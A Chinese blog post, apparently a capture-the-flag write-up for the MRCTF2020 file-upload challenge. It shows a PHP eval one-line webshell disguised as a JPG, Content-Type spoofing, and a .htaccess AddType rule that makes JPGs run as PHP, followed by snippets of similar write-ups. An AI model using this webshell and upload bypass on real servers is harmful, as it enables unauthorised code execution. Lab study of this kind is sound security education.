[MRCTF2020]你传你呢

最新推荐文章于 2023-10-10 23:11:19 发布
最新推荐文章于 2023-10-10 23:11:19 发布
阅读量167 收藏
点赞数
分类专栏: 靶场练习 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41571993/article/details/127164044
版权

解题步骤

​ 由首页得,该题目为文件上传漏洞类型,首先上传一个名为flag.php的木马文件,其内容为:

<?php
    eval($_POST['x']);
?>

​ 通过 Burpsuite 抓包测试,当不符合传输条件时会出现以下回显代码:

在这里插入图片描述

​ 我们修改文件后缀,使得文件名为flag.jpg,以及Content-Type内容为image/jpeg,并成功上传:

在这里插入图片描述

​ 我们可以想到使用 .htaccess 配置文件来使得上传的文件变为 PHP 文件类型,故创建一个 .htaccess 文件,其内容为:

AddType application/x-httpd-php jpg

​ 该文件可以使得所有后缀为 jpg 的文件解析为 PHP 文件,我们通过抓包并修改Content-Typeimage/jpeg并成功上传该文件:

在这里插入图片描述

​ 然后根据数据包中文件路径,通过蚁剑连接:

在这里插入图片描述

最后得到 flag:

在这里插入图片描述

小结

​ 一开始想到了使用 .htaccess,但是用如下代码构造了 .htaccess 文件:

<FilesMatch "XXE">
    SetHander application/x-httpd-php
</FilesMatch>

导致后序渗透不太理想,最后通过参考其他人的解题思路,重新构造了 .htaccess 文件,才成功对flag.jpg解析成功,最后的到了flag

丙戌年1101
关注
专栏目录
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 1996
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
[MRCTF2020]你你呢 1
devilare的博客
05-22 5588
[MRCTF2020]你你????呢 文件上漏洞,打开题目 随便上个文件嘿呦,被过滤了,试试大小写等等,好像都绕不过。嗯。。。瓶颈,看看大佬wp,.htaccess文件, htaccess小知识 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOver
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4330
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 483
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
[MRCTF2020]Ezpop 1(代码审计)
weixin_45577185的博客
10-13 330
太绕了,wuwuwu~ Welcome to index.php <?php //flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 /
BUUCTF | [MRCTF2020]你你呢
swordlb的博客
08-25 144
https://www.cnblogs.com/SpouseLJ/p/14967955.html
文件上 ---[MRCTF2020]你你呢
yzl_007的博客
08-20 300
[MRCTF2020]你你????呢 进入题目很醒目的打招呼方式 查看源码发现没什么东西 接着上试试,php被静止可以上jpg等图片 想到上.htaccess文件解析jpg马 修改Contnet-Type上成功 文件中 SetHandler application/x-httpd-php 这句话是将任何文件解析成php文件的意思,这个时候就可以上jpg文件马来连接了。 jpg文件能直接上,写下一句话木马然后改后缀直接上即可 如下上成功,然后用蚁剑连接 http://acc07ec
[MRCTF2020]你你呢1
weixin_61021815的博客
05-23 346
进入页面 从题目也看出来了,这是一个素质小哥 浅浅自己尝试了一下最基础的修改mime和后缀名 发现并不可以,就开始搜索wp(陋习伸手党) 此题使用的是 .htaccess 百度.htaccess的解释:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 意思是:如果目标服务器允许用户修
BUUCTF - [MRCTF2020]你你呢
qq_40860153的博客
10-12 447
1.打开题目,一个简单的文件上,需要利用 .htaccess 文件把.jpg文件解析成.php执行 2.上.php,发现不行,试试上.jpg,可以
[MRCTF2020]你你呢(文件上,.htaccess)
xlcvv的博客
04-06 4023
进来: 上一个一句话php,果然不行: 改成jpg后缀,上成功: 接着写一个.htaccess文件去把.jpg解析成.php,如下: AddType application/x-httpd-php .jpg 上失败,拿去抓包改一下content-type,注意,文件名在这里一定改成.htaccess才行: 接着连上菜刀在根目录找到flag(用菜刀一句话里参方式要是POST才行):...
BUUCTF WEB [MRCTF2020]你你*呢
Y1da的博客
04-18 327
BUUCTF WEB [MRCTF2020]你你🐎呢 解法有些类似[SUCTF 2019]CheckIn 尝试上各种php文件后缀均被过滤,尝试上.htaccess文件将png文件当做php文件执行 AddType application/x-httpd-php .png 上后抓包,将Content-Type修改为image/png POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu
【学习笔记 40】 buu [MRCTF2020]你你呢
weixin_43553654的博客
08-02 419
0x00 知识点 .htaccess文件上绕过 0x01 知识点详解 什么是.htaccess文件? 答:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 怎么利用.htaccess文件进行上? 答:我们可以在.htaccess文件文件中加入php解析规则,比如,本题中就利用这个解析规则将jpg
web:[MRCTF2020]你你呢
最新发布
sleepywin的博客
10-10 650
这里参考了大佬的wp,上一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行。上文件,先随便上一个文件看看情况。.htaccess文件的内容为。回显一片空白,说明木马上成功。构造含有一句话木马的图片上。这里用bp抓包修改类型。在根目录找到flag。
BUUCTF [MRCTF2020]你你呢
墨子辰的博客
02-04 675
考点:.htaccess文件上 先上一个正常图片,发现成功上而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上。 可能有人到这里就懵了,为什么要上1.sdga,它是个神马文件类型???? 对,这里我上了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上的招式咯。 看好了 别眨眼·~~~ No.1:上 .htaccess No.2:上 .user.ini
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丙戌年1101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值